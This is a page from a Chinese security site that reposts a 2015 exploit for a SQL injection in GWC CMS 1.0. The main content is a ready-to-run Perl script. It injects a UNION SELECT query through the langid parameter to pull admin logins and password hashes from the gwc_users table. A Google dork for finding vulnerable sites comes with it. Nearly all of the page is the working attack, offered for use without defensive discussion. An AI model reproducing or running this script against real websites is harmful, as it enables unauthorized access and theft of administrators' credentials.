首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GWC CMS 1.0 SQL Injection
来源:vfocus.net 作者:nopesled 发布时间:2015-07-10  
# Exploit Title: GWC CMS SQL Injection Vulnerability
# Exploit Author: nopesled
# Google Dork: "inurl:?langid=1 inurl:topmenuid="
# Date: 08/07/2015
# Version: 1.0
# Tested on: Linux
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(GET);

print " == Exploit by nopesled == \n";
if (@ARGV < 1){
	die "Invalid amount of arguments\nExample: perl ___FCKpd___0 http://site.com\n";
	}
$site = shift;	
$ua = LWP::UserAgent->new;
$payload = "$site/?langid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x3c62723e,userlogin,0x3a,userpasswd) from gwc_users--";
print "[+] Grabbing Admin login [+]\n";
$request = GET $payload;
$response = $ua->request($request);
if ($response->is_success){
	if ($response->content =~ /(.+[0-9a-f]{32})/){
		print "[+] Admin info obtained [+]\n\n$1\n";
		exit;
	}
	else {
		die "[+] Admin info not found [+]";
	}
}
else {
	die "[+] Request failed [+]";
	 }
exit;

=pod

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v2.0.20
Comment: https://keybase.io/crypto

wsBcBAABCgAGBQJVnUB5AAoJEOB0UMODnV4UWD0IAIPzPvMFsJOGhlv1HF1Nb1Xg
g9fWZ8FWBV0/+hUuEBQX0TmcEgugssdG+ce4qhYthnqgKa9PgM/oViDUn4eEK32c
/yyOgQ+uY4wMIZaV4LykLx3i9Dwh1kF+MuphLwHhPmuZMBu2sQNELJjdTtWJ6+cW
Ue9g1eF1Af+Hn2LY+LBSwb9XbLYSqFkUAYSon/NCQgC7YWA+t7+B434zkgXBwZDe
/ppTysv6nSI0EVap0u4dh7qafztQsFK2DF2f/cnU6JtYpOPvgbuoa/kHQ9yAVAr6
6LbNVN3uKXUd63ZlJvRAHao7mvrVzIojzstRiX8oOHl0u99NMHJukUEX7UhWXAM=
=TMgD
-----END PGP SIGNATURE-----

=cut

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash Player ByteArray U
·Symantec EP 12.1.4013 Denial O
·MiniUPNPd 1.0 Remote Denial Of
·NTP MON_GETLIST Query Amplific
·ipTIME DHCP Remote Command Exe
·File Roller 3.4.1 Denial Of Se
·WordPress S3Bubble Cloud Video
·UPNPD M-SEARCH ssdp:discover R
·Adobe Flash Player Nellymoser
·NTPD MON_GETLIST Query Amplifi
·ipTIME Remote Code Execution
·Western Digital Arkeia 11.0.13
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved